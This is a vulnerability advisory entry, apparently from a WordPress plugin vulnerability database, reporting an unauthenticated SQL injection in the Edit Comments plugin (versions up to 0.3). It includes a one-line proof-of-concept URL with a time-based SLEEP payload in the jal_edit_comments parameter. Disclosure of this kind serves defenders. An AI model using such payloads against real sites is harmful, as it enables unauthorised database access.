WordPress Plugin Vulnerabilities
Edit Comments <= 0.3 - Unauthenticated SQL Injection
Description
The plugin does not sanitise, validate or escape the jal_edit_comments GET parameter before using it in a SQL statement, leading to a SQL injection issue
Proof of Concept
Post a comment on a page, then open https://example.com/<post-page>/?jal_edit_comments=7%20AND%20(SELECT%209114%20FROM (SELECT(SLEEP(5)))wjzD)
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-07-24 (about 2 years ago)
Added
2021-07-24 (about 2 years ago)
Last Updated
2022-02-24 (about 2 years ago)